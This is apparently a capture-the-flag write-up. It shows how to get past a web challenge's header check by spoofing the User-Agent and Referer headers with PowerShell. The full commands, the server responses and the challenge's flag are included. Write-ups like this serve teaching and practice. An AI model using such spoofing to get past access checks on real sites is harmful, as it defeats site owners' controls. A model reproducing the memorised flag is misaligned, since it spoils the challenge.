Prompt: Try to bypass my security measure on this site! http://165.227.106.113/header.php
Based on the prompt and title we can safely assume we will need to use a web request to pull the flag out of the site. A header is a part of the HTTP protocol that allows clients and servers to exchange additional information about the request or response. The header typically contains metadata such as the content type, user agent, authentication information, and other details that help the server process the request or the client interpret the response. Based on the title of the challenge this is likely a good place to start.
To start I ran the following command in PowerShell:
Invoke-WebRequest http://165.227.106.113/header.phpThis produced the following output
StatusCode : 200
StatusDescription : OK
Content : Sorry, it seems as if your user agent is not correct, in order to access this website. The one you supplied is: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.19041.1682
<!-- S...
RawContent : HTTP/1.1 200 OK
Transfer-Encoding: chunked
Connection: keep-alive
Content-Type: text/html
Date: Thu, 28 Jul 2022 00:44:34 GMT
Server: nginx/1.4.6 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
...
Forms : {}
Headers : {[Transfer-Encoding, chunked], [Connection, keep-alive], [Content-Type, text/html], [Date, Thu, 28 Jul 2022 00:44:34 GMT]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml : mshtml.HTMLDocumentClass
RawContentLength : 221I wasn’t able to see the entirety of the Content section so I assigned this to a variable with the following:
$request = Invoke-WebRequest http://165.227.106.113/header.phpAnd then viewed the entire Content section with thte following:
$request.ContentThe produces the full message:
Sorry, it seems as if your user agent is not correct, in order to access this website. The one you supplied is: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.16
82
<!-- Sup3rS3cr3tAg3nt -->The “Sup3rS3cr3tAg3nt” comment on the page seems to be a vital clue. With that info, we passed the following request:
Invoke-WebRequest http://165.227.106.113/header.php -UserAgent Sup3rS3cr3tAg3ntThis outputs:
StatusCode : 200
StatusDescription : OK
Content : Sorry, it seems as if you did not just come from the site, "awesomesauce.com".
<!-- Sup3rS3cr3tAg3nt -->
RawContent : HTTP/1.1 200 OK
Transfer-Encoding: chunked
Connection: keep-alive
Content-Type: text/html
Date: Thu, 28 Jul 2022 00:49:12 GMT
Server: nginx/1.4.6 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
...
Forms : {}
Headers : {[Transfer-Encoding, chunked], [Connection, keep-alive], [Content-Type, text/html], [Date, Thu, 28 Jul 2022 00:49:12 GMT]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml : mshtml.HTMLDocumentClass
RawContentLength : 106With this message we can assume it requires the request to come from “awesomesauce.com”. With that we can form the header of the request with the following command:
Invoke-WebRequest http://165.227.106.113/header.php -UserAgent Sup3rS3cr3tAg3nt -Headers @{ Referer='awesomesauce.com' }To get the following output to reveal the flag:
StatusCode : 200
StatusDescription : OK
Content : Here is your flag: flag{did_this_m3ss_with_y0ur_h34d}
<!-- Sup3rS3cr3tAg3nt -->
RawContent : HTTP/1.1 200 OK
Transfer-Encoding: chunked
Connection: keep-alive
Content-Type: text/html
Date: Thu, 28 Jul 2022 00:50:38 GMT
Server: nginx/1.4.6 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
...
Forms : {}
Headers : {[Transfer-Encoding, chunked], [Connection, keep-alive], [Content-Type, text/html], [Date, Thu, 28 Jul 2022 00:50:38 GMT]...}
Images : {}
InputFields : {}
Links : {}
ParsedHtml : mshtml.HTMLDocumentClass
RawContentLength : 81Flag: flag{did_this_m3ss_with_y0ur_h34d}
Key Takeaway: User agents are used in request headers to identify the requester. Passing a user agent in your web requests can be used to provide unique output only meant for specific requestors.
Word Count: 559
